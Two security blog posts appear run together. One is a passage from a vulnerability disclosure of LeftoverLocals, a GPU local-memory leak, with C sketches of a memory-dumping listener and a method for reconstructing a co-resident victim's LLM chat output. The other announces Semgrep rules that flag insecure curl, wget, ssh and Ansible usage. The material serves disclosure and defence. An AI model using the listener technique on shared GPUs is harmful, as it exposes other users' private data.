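#include <stdio.h>

/* Sketch of the Listener's host-side loop: the caller is assumed to have
   created the queue, compiled the "listener" kernel, and allocated dump_buf. */
void listen_for_canary(cl_command_queue queue, cl_kernel listener_kernel,
                       cl_mem dump_buf, int *host_dump, size_t dump_ints,
                       size_t global_size, size_t local_size, int iterations) {
  for (int iter = 0; iter < iterations; iter++) {
    /* Launch the listener kernel, which copies uninitialized local memory into dump_buf. */
    clEnqueueNDRangeKernel(queue, listener_kernel, 1, NULL, &global_size,
                           &local_size, 0, NULL, NULL);
    /* Blocking read: copy the dumped local memory back to the host. */
    clEnqueueReadBuffer(queue, dump_buf, CL_TRUE, 0, dump_ints * sizeof(int),
                        host_dump, 0, NULL, NULL);
    /* Scan for the canary value (123) written by the co-resident Writer. */
    for (size_t i = 0; i < dump_ints; i++) {
      if (host_dump[i] == 123) {
        printf("Observed canary at dump index %zu on iteration %d\n", i, iter);
      }
    }
  }
}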

The following animation shows how the listener and writer interact, and how the listener may observe values from the writer if local memory is not cleared.

Figure 3: The Listener and Writer processes: the Writer stores canary values in local memory, while the Listener reads uninitialized local memory to check for the canary values

Listening to LLM responses

In this section, we provide an overview of how LeftoverLocals can be exploited by a malicious actor (an attacker) to listen to another user’s (the victim) LLM responses on a multi-tenant GPU machine, followed by a detailed description of the PoC.

At a high level, both actors are executed as co-resident processes. The attack process implements the listener described above, with the additional steps of comparing the stolen values to various fingerprints. The victim process is unknowingly the writer, where instead of canary values, the values being written are sensitive components of an interactive LLM chat session. The attack ultimately follows two steps:

  • The attack process fingerprints the model that the victim process is using by repeatedly dumping (i.e., listening to) the leftover local memory, which, in this scenario, consists of sensitive components of the linear algebra operations used by the victim in the LLM model architecture.
  • The attacker then repeatedly listens to the victim's process again, specifically waiting for the LLM to execute its output layer, which can be identified using weights or memory layout patterns from the earlier fingerprinting.

Note that the output layer is a matrix-vector multiplication with two inputs: the model weights, and the layer input—in other words, the values derived from the user input that propagated through the earlier levels of the deep neural network (DNN). Given that the model weights of the output layer are too large to comprehensively steal, an attacker can inspect available open-source models to fully obtain the weights through the exposed model fingerprint. We found that the second input to the last layer (i.e., the layer input) is subsequently small enough to fit into local memory. Thus, the entire layer input can be stolen, and the attacker can reproduce the final layer computation to uncover the final result of the DNN.
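
Conceptually, the attacker's reconstruction of the final layer is just a matrix-vector product followed by picking the most likely token. Here is a simplified sketch, ignoring the quantized weight formats and sampling strategies that real LLM runtimes use and assuming greedy decoding:

#include <stddef.h>

/* Simplified sketch: recompute the output layer y = W * x and return the index
   of the largest logit. W comes from the fingerprinted open-source model; x is
   the layer input stolen from GPU local memory. */
size_t reproduce_output_token(const float *W, const float *x,
                              size_t vocab_size, size_t hidden_size) {
  size_t best = 0;
  float best_logit = -1e30f;
  for (size_t row = 0; row < vocab_size; row++) {
    float logit = 0.0f;
    for (size_t col = 0; col < hidden_size; col++) {
      logit += W[row * hidden_size + col] * x[col];
    }
    if (logit > best_logit) {
      best_logit = logit;
      best = row;
    }
  }
  return best;
}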

Figure 4: Steps of the PoC exploit whereby an attacker process can uncover data to listen to another user’s interactive LLM session with high fidelity

We note that this is a fairly straightforward attack, and with further creativity and ingenuity, a threat actor may be able to construct further complex and sophisticated malicious scenarios that may compromise ML applications in more severe ways. Below we provide a detailed description of the PoC, and the configuration and testing carried out on various GPU platforms to uncover their susceptibility to LeftoverLocals.

Our configuration: We outline our configuration in the table below. Our attack builds on the llama.cpp LLM due to its simplicity and variety of support for GPU acceleration. In our example we use a large discrete GPU that we found to be susceptible to LeftoverLocals: the AMD Radeon RX 7900 XT. We configure llama.cpp to use OpenCL for GPU acceleration, which uses the CLBLAST linear algebra library. We use the wizardLM-7B.ggmlv3.q5_0.bin model, which can be obtained from Hugging Face. This model was selected due to its reasonable size, which enabled rapid prototyping and analysis; however, this attack is transferable to many different models. In our threat model, we assume that the victim is using the LLM in an interactive chat session.

Modification: The attack requires an optimized GPU implementation of matrix-vector multiplication. We found that the current matrix-vector multiplication in llama.cpp (which does not call into CLBLAST) is not implemented in an optimized, idiomatic way: it stores partial dot product results in local memory and then combines them at the end. While there is a more complex approach using linear algebra to achieve the same results, for the simplicity of our PoC and demonstration, we replace the llama.cpp matrix-vector multiplication with our own, more idiomatic implementation (following GPU programming best practices).

Step 1—Fingerprinting the model: An attacker can fingerprint a model if it can listen to several inference queries from the victim. In our configuration, the GPU contains roughly 5MB of local memory. The model has roughly 33 layers, each of them consisting of a matrix multiplication operation. Matrix multiplication is often optimized on GPUs by using tiling: an approach that subdivides the matrices into small matrices, performs the multiplication, and then combines the results (as detailed here). In many optimized libraries, including CLBLAST, local memory is used to cache the smaller matrices. Thus, for every layer, the attacker can steal ~2.5MB of weights, and ~2.5MB of the inputs. While this is a significant amount of data, we note that it is not enough to reconstruct the entire computation. Many of these layers have weights and inputs that are 100s of MB large.

However, for a whole inference computation (33 layers), the attacker can steal around 80MB of the weights, which is sufficient to fingerprint the model (assuming the user is using an open-source model, such as one that can be found on Hugging Face). Given this, we assume that it is a straightforward task to fingerprint the model, and thus for the attacker to obtain the full model being used by the victim.

Step 2—Listening to the LLM output: The attacker can then turn their attention to the output layer of the DNN. In our configuration, we found that the output layer is a matrix-vector multiplication, rather than a matrix-matrix multiplication. The weights matrix is large (~128MB), but the input vector is quite small (~4KB). However, given that the attacker has fingerprinted the model in step 1, the attacker does not need to comprehensively steal the weights as they are available from the fingerprinted model.

Matrix-vector multiplication has a different GPU implementation than matrix-matrix multiplication. In the case where the input vector fits in local memory, the most performant implementation is often to cache the input vector in local memory, as it is used repeatedly (i.e., for repeated dot products). Because the input vector is stored entirely in local memory, the attacker can steal this entire vector. In determining whether the attacker has found local memory from the output layer, we discovered that the attacker could simply look for 4KB of floating point values with zeros on either side. In our testing, this unique fingerprint was associated with the output layer nearly every single time. For different models and different GPUs, this fingerprint will likely have to be recalibrated.

Putting it together: With an attacker in possession of both the weights and the input vector, they can perform the final computation and obtain the result of the inference. This allows the attacker to reproduce the output of the victim’s LLM chat session with high fidelity, as demonstrated in the introduction. In practice, we tuned the attacker to dump the local memory very efficiently (that is, by using only a small number of threads and requiring a small amount of memory). This allows the attacker to listen to long chat queries with only a small number of noticeable artifacts. Some of the artifacts observed include:

  • Duplicate tokens: This occurs when the attacker steals the same output layer twice due to circumstances such as the attacker process being scheduled twice in a row, thus the LLM was not scheduled to compute its next token.
  • Missing tokens: This occurs when the attacker kernel isn’t scheduled at the right time, i.e., immediately after the output layer computation kernel.
  • Incorrect tokens, output due to:
    • The attacker misidentifying a stolen set of data as the last layer; in this case, it will print a junk token.
    • The production of a token that is “close” to the original output, even if it is not exact. That is, the attacker may be unable to steal the exact token embedding at the target layer. This results in a corrupted token embedding that, when decoded, is semantically similar (in the word2vec sense) to the original token. As an example, in the GIF provided at the beginning, the attacker extracts the incorrect word “Facebook”, which is semantically similar to other named-entity tokens (like “Google” and “Amazon”) in the generated text.

Despite these discrepant artifacts, the stolen text is more than sufficient to uncover the LLM response. Additionally, the attacker can be further tuned by, for example, having multiple threads launch the listener kernel or by having a more precise fingerprint of the last layer.

Testing GPU platforms for LeftoverLocals

Given the diversity of the devices we tested, there exist several applications that can test for LeftoverLocals, written in a variety of frameworks:

  • Vulkan Command Line: A command line application using Vulkan. The kernel is written in OpenCL and compiled to SPIR-V using clspv. It uses a simple Vulkan wrapper called EasyVK.
  • OpenCL Command Line: A command line application that uses the OpenCL framework.
  • Apple App: An Apple app that can be deployed on iOS or macOS. It targets the GPU using Apple’s Metal framework.
  • Android App: An Android app that uses Vulkan to target mobile GPUs. The code uses Vulkan’s C API (through EasyVK again) using JNI. The kernels are the same as in the Vulkan command line app: they are written in OpenCL and compiled to SPIR-V using clspv.

Using the above programs, we tested 11 devices spanning seven GPU vendors (and multiple GPU frameworks in some cases). We observed LeftoverLocals on devices from three of the vendors (Apple, Qualcomm, and AMD). The amount of memory leaked depends on the size of the GPU. Larger GPUs contain more physical memory, and thus, leak more data. For the larger GPUs (e.g., an AMD Radeon RX 7900 XT), we found that we can leak over ~5MB per kernel. The following table outlines the system info for the GPUs on which we were able to observe LeftoverLocals (QC refers to Qualcomm):

For some devices, specifically those from Arm, we were not able to observe the canary value from the Writer in the Listener, but we did observe non-zero data. Representatives from Arm reviewed our observations and concluded that although these values are not zero, they are not from a memory leak.

Additionally, we tested some GPUs from NVIDIA, Intel, and Imagination. For these devices, we observed only zeros in local memory, and thus did not observe LeftoverLocals. It is unclear if all their devices are not impacted. For example, although we did not observe the issue on our Imagination device, Google notified us that they were able to observe it on other Imagination devices.

The following YouTube video demonstrates the different interfaces and examples of LeftoverLocals (namely, the LLM PoC attack, covert communication channels, and searching for canary values) on a few different platforms using a few different applications.

Vulnerable environments: An attack program must be co-resident on the same machine and must be “listening” at the same time that the victim is running a sensitive application on the GPU. This could occur in many scenarios: for example, if the attack program is co-resident with the victim on a shared cloud computer with a GPU. On a mobile device, the attack could be implemented in an app or a library. Listening can be implemented efficiently, and thus can be done repeatedly and constantly with almost no obvious performance degradation.

Next, we briefly discuss other environments where GPUs are either deployed or where an attacker might have access to sensitive information. Although it appears that some current systems (e.g., WebGPU) are not currently impacted, the ever-growing prevalence of ML and the diversity of modern GPUs mean that the next iteration of these systems (or other near-future systems) may be severely compromised by these types of vulnerabilities.

  • Cloud providers: Cloud providers (e.g., AWS and Azure) are unlikely to provide shared GPU instances, especially if users have dedicated access to the GPU machine. In other cases, GPUs could be shared using very conservative GPU VM technology (such as NVIDIA's vGPU or AMD's MxGPU), which physically partitions the GPU and therefore prevents users from sharing GPU resources (e.g., local memory). Given this, many current cloud GPU systems may not currently be vulnerable to LeftoverLocals; however, we do not have conclusive evidence to determine this given the general lack of visibility into the specification and implementation of these systems. We note that we have observed LeftoverLocals on multi-user Linux servers, as well as on desktop (Windows and Mac) systems through traditional multi-processing. This includes Docker containers on these systems.
  • Mobile applications: In our experiments and explorations in the mobile domain, we were able to run concurrent GPU processes (from different apps on iOS or Android) only in very specific instances. That is, we were not able to run a GPU process (e.g., from a malicious listener app) in the background while other apps (e.g., the victim) were run in the foreground. As with our analysis of cloud providers, we were unable to find clear documentation that explicitly detailed these constraints, and so we cannot definitively claim whether they are vulnerable. However, as seen in the video above, LeftoverLocals can be exploited either when a malicious listener app is run side-by-side with a victim app, or if the malicious listener app is quickly swapped from the background into the foreground from a victim app.
  • Remote attacks: We preliminarily investigated the possibility of attacks originating from websites (e.g., those hosted by a remote attacker). To our knowledge, web applications do not have the low-level features required to listen to local memory using GPU graphics frameworks, such as WebGL. We note that the new WebGPU framework does provide low-level capabilities that allow a webpage to access local memory. Conservatively, WebGPU initializes and performs dynamic array bounds checking on local memory (and global memory), which mitigates this vulnerability. However, these checks cause significant overhead, as documented in discussions like this one. To test this further, our code repo contains a simple listener in WebGPU. As expected, we have only observed zeros in local memory, even on devices that are vulnerable to LeftoverLocals through other frameworks. However, GPU compilers are known to be fragile, and it is not difficult to imagine finding a compiler bug that could somehow bypass these checks (especially using fuzzing techniques). Our position is that LeftoverLocals should be addressed at a lower level (e.g., the driver).

How GPU vendors can resolve this vulnerability: To defend against LeftoverLocals, GPUs should clear their local memory between kernel calls. While this could cause some performance overhead, our experiments show that many GPU vendors (e.g., NVIDIA, Intel) currently appear to provide this functionality. It even appears that some of this functionality is provided for impacted GPUs. For example, Mesa drivers for AMD GPUs clear local memory after a compute kernel launch. However, this approach has a fundamental flaw that makes it vulnerable to LeftoverLocals: the memory wipe is done with a separate kernel; thus, the GPU kernel queue may contain a malicious listener between the computation kernel and the local memory wipe, allowing the listener to steal memory. Instead, the computation kernel and the local memory wipe need to occur atomically, i.e., without allowing any other kernel to be interleaved between them. Otherwise, users may attempt to preemptively defend themselves against LeftoverLocals as described in the next section.

Mitigations: In light of a lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory. As we’ve previously noted, before the kernel ends, the GPU threads should store 0 to any local memory locations that were used in the kernel. Given that GPU tasks are typically interleaved at the kernel boundary, this will prevent another user from being able to read leftover values. We note that this mitigation may be difficult for many users, especially because GPU code is often buried deep in complex software stacks (e.g., for ML). Furthermore, the GPU code may be part of a highly optimized library (e.g., ML linear algebra routines). In these cases, it is very difficult to identify how local memory is used, and even more difficult to modify the kernel to zero it out. It may be possible to augment a compiler to add this functionality, similar to how WebGPU handles GPU memory accesses (described above). These mitigations do have a performance overhead that should be taken into account. Another blunt mitigation involves simply avoiding multi-tenant GPU environments.

Impact on LLMs and GPU platforms

LLM security

Our PoC attack examines only one application: an interactive open-source LLM session. However, with a little creativity, attackers could likely target many GPU applications, including those used within privacy-sensitive domains. Our motivation stems from the recent increased use and support of open-source models, often accompanied by claims that their “openness” inherently entails safety and security through transparency. A recent article in Nature even alleges that only open-source generative AI models can “safely” revolutionize health care, a safety-critical domain. Yet, even if open-source models provide the opportunity to be rigorously audited and assessed (which they have yet to be), their deployment still hinges on a closed-source stack (i.e., GPUs). And as demonstrated by LeftoverLocals, open-source LLMs are particularly susceptible to our vulnerability given our ability to fingerprint these models to obtain remaining weights as needed. Indeed, we have already observed announcements regarding the deployment of open-source models in collaboration with impacted GPU vendors, including Hugging Face’s collaboration with AMD, Lamini’s deployment on AMD GPUs, and the Qualcomm and Meta partnership for edge devices.

Generally, the introduction of ML poses new attack surfaces that traditional threat models do not account for, and that can lead to implicit and explicit access to data, model parameters, or resulting outputs, increasing the overall attack surface of the system. It is crucial to identify and taxonomize novel classes of failure modes that directly impact ML models, in addition to novel threats that can compromise the ML Ops pipeline, as we have demonstrated with LeftoverLocals. We discuss GPU-specific threat implications in the following section.

GPU providers, applications, and vendors

While many platforms are not currently impacted (see Vulnerable environments), we emphasize that the GPU compute landscape is evolving rapidly. As some examples: a growing number of GPU cloud providers have various policies and available configurations; and GPU programming frameworks, such as Vulkan and Metal, are well-supported on mainstream platforms, and can be used in apps without requiring extra privileges. While these developments are exciting, they increase the threat potential of GPU vulnerabilities, as LeftoverLocals illustrates. As far as we are aware, there is no unified security specification for how GPUs are required to handle sensitive data, and no portable test suite to check if systems are vulnerable to simple memory leaks, like LeftoverLocals. Thus, GPU compute environments should be rigorously scrutinized when used for processing any type of sensitive data.

As mentioned above, while we focus on LLM applications, GPU local memory is one of the first tools that a GPU developer uses when optimizing an application. Although such attacks would likely require analyzing the victim's GPU kernel code to identify local memory usage, attacks are likely possible in other GPU compute domains, such as image processing and scientific computing. It will likely be increasingly difficult for users to detect and defend against these attacks since it's unlikely they will know if their application is vulnerable to LeftoverLocals; this would require knowing the details of the exact GPU kernel code, which are often hidden away in highly optimized linear algebra libraries (e.g., CLBLAST). Additionally, an overall lack of specification in up-and-coming GPU platforms makes it difficult to determine whether the compiler or runtime will use impacted memory regions without the user knowing. For example, Apple GPUs have a new caching mechanism, called dynamic caching, that does not have a clear specification regarding whether local memory regions are being used for other purposes.

Coordinated disclosure

Since September 2023, we have been working with CERT/CC on a large coordinated disclosure involving all major GPU vendors, including NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination. Trail of Bits provided vendors a total of 125 days to test their products and provide remediations. The coordination gradually grew to include software stakeholders, including Google, Microsoft, and others, which allowed us to understand how LeftoverLocals impacts privacy requirements at different stages of the ML supply chain. Apple did not engage with us regarding the disclosure until January 13, 2024, just days before the public disclosure (see the timeline below).

A high-level timeline of the disclosure is provided below:

  • September 8, 2023: Trail of Bits submitted report to the CERT/CC
  • September 11, 2023: CERT/CC acknowledged the submission of LeftoverLocals and began the process of vendor outreach and CVE assignment with a preliminary disclosure date of December 11, 2023
  • September 14, 2023: AMD acknowledged the CERT disclosure
  • September 15, 2023: Qualcomm acknowledged the CERT disclosure
  • September 22, 2023: The case report was shared with Khronos and OpenCL working group
  • September 29, 2023: NVIDIA acknowledged disclosure and confirmed they were not affected by the vulnerability
  • November 22, 2023: ToB extended the embargo to January 16, 2024, to accommodate vendor requests for more time
  • January 11, 2024: We received a notice that Qualcomm provided a patch to their firmware that addresses this issue only for some of their devices. Additionally, Google noted that ChromeOS Stable 120 and LTS 114 will be released on January 16 to include AMD and Qualcomm mitigations.
  • January 13, 2024: Apple confirmed that the A17 and M3 series processors contain fixes to the vulnerability.
  • January 14, 2024: Google notified us that they observed that some Imagination GPUs are impacted.
  • January 16, 2024: Embargo lift and public disclosure of LeftoverLocals

Moving forward

Now that GPUs are being used in a wide range of applications, including privacy sensitive applications, we believe that the wider GPU systems community (vendors, researchers, developers) must work towards hardening the GPU system stack and corresponding specifications. This should be accomplished through robust, holistic specifications that describe both GPU programs’ behavior and how GPU devices integrate with the rest of the system stack (e.g., the OS or hypervisor). Furthermore, these specifications should be rigorously tested to account for the diversity of GPU systems and safety requirements of diverse application domains. Looking forward, a wide variety of new AI chips are being developed and will require rigorous security analysis.

There are positive developments in this direction. For example, AMD’s ROCm stack is open, and thus available for independent rigorous evaluation, and the Khronos Group has safety critical specification groups. Additionally, cross-vendor programming frameworks, such as Vulkan, have been incredibly useful for writing portable test suites, as opposed to single-vendor programming frameworks.

While GPU security and privacy guarantees are scattered and scarce, the Vulkan specification outlines a reasonable definition of security for GPU platforms to adhere to—a definition that several platforms clearly violate, as our results show:

… implementations must ensure that […] an application does not affect the integrity of the operating system[…]. In particular, any guarantees made by an operating system about whether memory from one process can be visible to another process or not must not be violated by a Vulkan implementation for any memory allocation.

Given the role of Khronos specifications in this result, we included the Khronos Group in the coordinated disclosure. They connected us with representatives of various impacted vendors, and engaged in fruitful discussions about security specifications and testing. Prior to the release, Khronos released this statement in support of this work:

Khronos welcomes the work by Tyler Sorensen and Trail of Bits to increase security around the usage of Khronos APIs and have been working closely with them for several months to ensure that API implementers are aware and able to act on any issues. Khronos is also diligently exploring additional actions relating to API specifications, conformance testing, and platform vendor cooperation to continually strengthen safety and security when using Khronos compute and rendering APIs. – Neil Trevett, Khronos President

With the dust settling, our position is the following: given the wide diversity of GPUs and their critical importance in enabling machine learning applications, these devices, and their ecosystems, are in need of (1) a detailed threat model that considers the various types of data processed on GPUs and how this data might be compromised; (2) an exploration of the GPU execution stack to determine where and how GPU security properties should be specified and implemented; and (3) significant testing and auditing to fortify the GPU ecosystem, which is the computational foundation of machine learning.

For full transparency, we note that Tyler Sorensen has been an invited member of the Khronos group (sponsored by Google) since 2019, and participates in the memory model technical specification group.

Acknowledgements: We thank Max Ammann, Dominik Czarnota, Kelly Kaoudis, Jay Little, and Adelin Travers for their insightful comments and feedback on the vulnerability, PoC, and throughout the disclosure process. We also thank the Khronos Group for discussing technical specification details with us, and providing an avenue for us to engage with many vendors. We thank CERT/CC, specifically Vijay Sarvepalli and Ben Koo, for organizing the coordinated disclosure, especially considering the potential breadth of the vulnerability. Thanks to Adam Sorensen and Trent Brunson for helping create the vulnerability logo. Finally, thank you to everyone who engaged with us on this issue. This was a large project and we had discussions with many people who provided valuable insights and perspectives.

Background: How GPUs work

GPUs are massively parallel, throughput-oriented co-processors. While originally designed to accelerate graphics workloads, their design, which balances flexible programming and high computational throughput, has been highly effective in a variety of applications. Perhaps the most impactful current application domain is machine learning, where GPUs are the computational workhorse and achieve nearly all major results in this area.

GPUs are not only in large servers; they are in our phones, our tablets, and our laptops. These GPUs come from a variety of vendors, with almost all major hardware vendors (Apple, AMD, Arm, Qualcomm, Intel, and Imagination) producing their own GPU architecture. These GPUs are increasingly used for ML tasks, especially because doing ML locally can preserve users’ privacy, achieve lower latency, and reduce computational burdens on service providers.

GPU architecture: GPU architecture has a parallel, hierarchical structure. At the top level, a GPU is made up of Compute Units (sometimes called Streaming Multiprocessors in NVIDIA literature). Large, discrete GPUs contain many compute units, and smaller, mobile GPUs have fewer. For example, the large AMD Radeon RX 7900 XT discrete GPU has 84 compute units, while the mobile Qualcomm Adreno 740 GPU has 8. All compute units have access to global memory. On discrete GPUs, global memory is implemented using VRAM; on integrated GPUs, global memory simply uses the CPU’s main memory.

Compute units encapsulate both compute and memory components. Compute units contain an array of processing elements; these simple cores are the fundamental units of computation and execute a stream of GPU instructions. In terms of memory, compute units often contain a cache for global memory, but they also contain a special region of memory called local memory. This is an optimized memory region that is shared only across processing elements in the same compute unit. This memory can be accessed with significantly less latency than global memory, but also has much smaller capacity. Different GPUs have varying amounts of local memory, typically ranging from 16KB to 64KB. For example, the AMD Radeon RX 7900 XT GPU has 84 compute units and a local memory size of 64KB; thus, the total amount of local memory on the GPU is ~5MB. Local memory is a software-managed cache: the program executing on the processing elements is responsible for loading values into local memory (e.g., values that will be repeatedly used from global memory).

GPU execution model: A GPU program, called a (GPU) kernel, is written in a shader language. Common examples are SPIR-V (Vulkan), OpenCL C (OpenCL), and Metal Shading Language (Metal). These kernels specify a single entry point function, called the kernel function, which is executed by many invocations (i.e., GPU threads). Invocations have unique built-in identifiers (such as a global ID), which can be used to index a unique data element in a data-parallel program. Invocations are further partitioned into workgroups. Each workgroup is mapped to a compute unit (although many workgroups may execute on the same compute unit, depending on resource requirements). All invocations have access to the same global memory, but only invocations in the same workgroup will share the same local memory.

Applications that use the GPU often launch many short-running kernels. These kernels often correspond to basic operations, such as matrix multiplication or convolution. Kernels can then be executed in sequence; for example, each layer in a deep neural network will be a kernel execution. Local memory is statically allocated at each kernel launch and is not specified to persist across kernel calls.

Platforms generally do not time-multiplex different GPU kernels. That is, if multiple kernels are launched simultaneously (e.g., by different users), the GPU will execute one kernel to completion before the next kernel starts. Because GPU kernels are typically short running, sharing GPU resources at kernel boundaries saves expensive preemption overhead while also maintaining acceptable latency in practice.

Terminology: Because this blog post focuses on portable GPU computing, it uses OpenCL GPU terminology. For readers more familiar with GPU terminology from a different framework (e.g., CUDA or Metal), we provide the following translation table:

30 new Semgrep rules: Ansible, Java, Kotlin, shell scripts, and more

17 January 2024 at 13:30

By Matt Schwager and Sam Alws

We are publishing a set of 30 custom Semgrep rules for Ansible playbooks, Java/Kotlin code, shell scripts, and Docker Compose configuration files. These rules were created and used to audit for common security vulnerabilities in the listed technologies. This new release of our Semgrep rules joins our public CodeQL queries and Testing Handbook in an effort to share our technical expertise with the security community. This blog post will briefly cover the new Semgrep rules, then go in depth on two lesser-known Semgrep features that were used to create these rules: generic mode and YAML support.

For this release of our internal Semgrep rules, we focused on issues like unencrypted network transport (HTTP, FTP, etc.), disabled SSL certificate verification, insecure flags specified for common command-line tools, unrestricted IP address binding, miscellaneous Java/Kotlin concerns, and more. Here are our new rules:

Mode Rule ID Rule description
Generic container-privileged Found container command with extended privileges
Generic container-user-root Found container command running as root
Generic curl-insecure Found curl command disabling SSL verification
Generic curl-unencrypted-url Found curl command with unencrypted URL (e.g., HTTP, FTP, etc.)
Generic gpg-insecure-flags Found gpg command using insecure flags
Generic installer-allow-untrusted Found installer command allowing untrusted installations
Generic openssl-insecure-flags Found openssl command using insecure flags
Generic ssh-disable-host-key-checking Found ssh command disabling host key checking
Generic tar-insecure-flags Found tar command using insecure flags
Generic wget-no-check-certificate Found wget command disabling SSL verification
Generic wget-unencrypted-url Found wget command with unencrypted URL (e.g., HTTP, FTP, etc.)
Java, Kotlin gc-call Calling gc suggests to the JVM that the garbage collector should be run, and memory should be reclaimed. This is only a suggestion, and there is no guarantee that anything will happen. Relying on this behavior for correctness or memory management is an anti-pattern.
Java, Kotlin mongo-hostname-verification-disabled Found MongoDB client with SSL hostname verification disabled
YAML (Ansible) apt-key-unencrypted-url Found apt key download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) apt-key-validate-certs-disabled Found apt key with SSL verification disabled
YAML (Ansible) apt-unencrypted-url Found apt deb with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) dnf-unencrypted-url Found dnf download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) dnf-validate-certs-disabled Found dnf with SSL verification disabled
YAML (Ansible) get-url-unencrypted-url Found file download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) get-url-validate-certs-disabled Found file download with SSL verification disabled
YAML (Ansible) rpm-key-unencrypted-url Found RPM key download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) rpm-key-validate-certs-disabled Found RPM key with SSL verification disabled
YAML (Ansible) unarchive-unencrypted-url Found unarchive download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) unarchive-validate-certs-disabled Found unarchive download with SSL verification disabled
YAML (Ansible) wrm-cert-validation-ignore Found Windows Remote Management connection with certificate validation disabled
YAML (Ansible) yum-unencrypted-url Found yum download with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) yum-validate-certs-disabled Found yum with SSL verification disabled
YAML (Ansible) zypper-repository-unencrypted-url Found Zypper repository with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Ansible) zypper-unencrypted-url Found Zypper package with unencrypted URL (e.g., HTTP, FTP, etc.)
YAML (Docker Compose) port-all-interfaces Service port is exposed on all interfaces

Semgrep 201: intermediate features

Semgrep is a static analysis tool for finding code patterns. This includes security vulnerabilities, bug variants, secrets detection, performance and correctness concerns, and much more. While Semgrep includes a proprietary cloud offering and more advanced rules, Semgrep CLI is free to install and run locally. You can run Trail of Bits’ rules, including the rules mentioned above, with the following command:

semgrep scan --config p/trailofbits /path/to/code

This post will not go into all the details of each rule presented above. The basics of Semgrep have already been discussed extensively by both Trail of Bits and the broader security community, so this post will discuss two lesser-known Semgrep features in more depth: generic mode and YAML support.

generic mode

Semgrep’s generic mode provides an easy method for searching for arbitrary text. Unlike Semgrep’s syntactic support for programming languages like Java and Python, generic mode is glorified text search. Naturally, this provides both advantages and disadvantages: generic mode has a tendency to produce more false positives but also fewer false negatives. In other words, it produces more findings, but you may have to sift through them. Limiting rule paths is one way to avoid false positives. However, the primary reason for using generic mode is the breadth of data it can search.

generic mode can roughly be thought of as an ergonomic alternative to regular expressions. They both perform arbitrary text search, but generic mode offers improved handling of newlines and other white space. It also offers Semgrep’s familiar ellipsis operator, metavariables, and a tight integration with the rest of the Semgrep ecosystem for managing findings. Any text file or text-based data can be analyzed in generic mode, so it’s a great option when you want to analyze less commonly used formats such as Jinja templates, NGINX configuration files, HAML templates, TOML files, HTML content, or any other text-based format.

The primary disadvantage of generic mode is that it has no semantic understanding of the text it parses. This means, for example, that patterns may be incorrectly detected in commented code or other unintended places—in other words, false positives. For example, if we search for os.system(...) in both generic mode and python mode in the following code, we will get different results:

import os

# Uncomment when debugging
# os.system("debugger")

os.system("run_production")

Figure 1: Python code with a line commented out

$ semgrep scan --lang python --pattern "os.system(...)" test.py 
...                       
    test.py 
            6┆ os.system("run_production")
...
Ran 1 rule on 1 file: 1 finding.

Figure 2: python mode semantically understands the comment.

$ semgrep scan --lang generic --pattern "os.system(...)" test.py 
...                       
    test.py 
            4┆ # os.system("debugger")
            ⋮┆----------------------------------------
            6┆ os.system("run_production")
...
Ran 1 rule on 1 file: 2 findings.

Figure 3: generic mode does not semantically understand the comment.

Another disadvantage of generic mode is that it misses out on Semgrep's extensive list of equivalences. Despite this, we still felt it was the right tool for the job when searching for these specific patterns. Sifting through a few false positives is okay if it means we don't miss a critical security bug.

Given generic mode’s disadvantages, why use it for many of the rules released in this post? After all, Semgrep has official language support for both Bash and Dockerfiles. But consider the ssh-disable-host-key-checking rule. Using generic mode will find SSH commands disabling StrictHostKeyChecking in Bash scripts, Dockerfiles, CI configuration, documentation files, system calls in various programming languages, or other places we may not even be considering. Using the official Bash or Dockerfile support will cover only a single use case. In other words, using generic mode gives us the broadest possible coverage for a relatively simple heuristic that is applicable in many different scenarios.

For more information, see Semgrep’s official documentation on generic pattern matching.

YAML support

In addition to generic mode, YAML support helps make Semgrep a one-stop shop for searching for code, or text, in basically any text-based file in your filesystem. And YAML is eating the world: Kubernetes configuration, AWS CloudFormation, Docker Compose, GitHub Actions, GitLab CI, Argo CD, Ansible, OpenAPI specifications, and yes, Semgrep rules themselves are even written in YAML. In fact, Semgrep has best practice rules written for Semgrep rules in Semgrep rules. Sem-ception.

Of course, you could write a basic utility in your programming language of choice that uses a mainstream YAML library to parse YAML and search for basic heuristics, but then you would be missing out on the rest of the Semgrep ecosystem. The fact that you can manage all these different types of files and file formats in one place is Semgrep's killer feature. YAML rules sit next to Python rules, which sit next to Java rules, which sit next to generic rules. They all run in CI together, and findings can be managed in the same place. Ten tools for ten types of files are no longer necessary.

We were recently engaged in an audit that included a large Ansible implementation. With this in mind, we set out to cover many of the basic security concerns one may expect in the Ansible.Builtin namespace. Searching for YAML patterns using Semgrep's YAML rule format has a tendency to make your head spin, but once you get used to it, it becomes relatively formulaic. The highly structured nature of formats like JSON and YAML makes searching for patterns straightforward. The Ansible rules presented at the top of this post are relatively clear-cut, so instead let's consider the patterns for the port-all-interfaces rule, which highlight the YAML functionality more distinctly:

patterns:
  - pattern-inside: |
      services:
        ...
  - pattern: |
      ports:
        - ...
        - "$PORT"
        - ...
  - focus-metavariable: $PORT
  - metavariable-regex:
      metavariable: $PORT
      regex: '^(?!127.\d{1,3}.\d{1,3}.\d{1,3}:).+'

Figure 4: patterns searching for ports listening on all interfaces

The | YAML block style indicator used in the pattern-inside and pattern operators states that the text below is a plaintext string, not additional Semgrep rule syntax. Semgrep then interprets this plaintext string as YAML. Again, the fact that this is YAML within YAML takes some squinting at first, but the rest of the rule is relatively straightforward Semgrep syntax.

The rule itself looks for services binding to all interfaces. The Docker Compose documentation states that, by default, services will listen on 0.0.0.0 when ports are specified. This rule finds port mappings that are not prefixed with a loopback address, such as 127.0.0.1, meaning the service listens on all interfaces. This is not always a problem, but it can lead to issues like firewall bypass in certain circumstances.

Extend your reach with Semgrep

